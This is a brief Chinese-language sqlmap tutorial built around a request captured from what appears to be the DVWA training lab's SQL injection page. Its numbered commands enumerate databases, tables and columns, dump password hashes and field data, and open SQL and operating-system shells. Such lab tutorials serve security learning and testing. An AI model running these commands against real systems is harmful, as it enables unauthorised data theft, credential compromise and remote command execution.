sqlmap

sqlmap

1、保存数据包记得把sql注入参数后加上*号，告诉sqlmap注入点位置

GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1

Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=vfkitbjkbdhqqjcr6ou8bjrb35; security=low
Connection: close

2、sqlmap简单判断注入点

获取当前数据库用户名
sqlmap -r /路径/123.txt  -v 3 --current-user

获取root账号密码
sqlmap -r /路径/123.txt  -v 3 --passwords

sqlmap -r /路径/123.txt  -v 3 

3、查询当前数据库

sqlmap -r /路径/123.txt  -v 3 --current-db 

4、列数据库

sqlmap -r /路径/123.txt  -v 3 --dbs

5、指定的库所有表

sqlmap -r /路径/123.txt  -v 3 -D 库名 --tables

6、查询指定表字段名

sqlmap -r /路径/123.txt  -v 3 -D 库名 -T 表名 --columns

7、查询字段数据

sqlmap -r /路径/123.txt  -v 3 -D 库名 -T 表名 -C 字段1,字段2 --dump

8、交互sqlshel

sqlmap -r /路径/123.txt  -v 3 --sql-shell

9、获取cmd权限

sqlmap -r /路径/123.txt  -v 3 --os-shell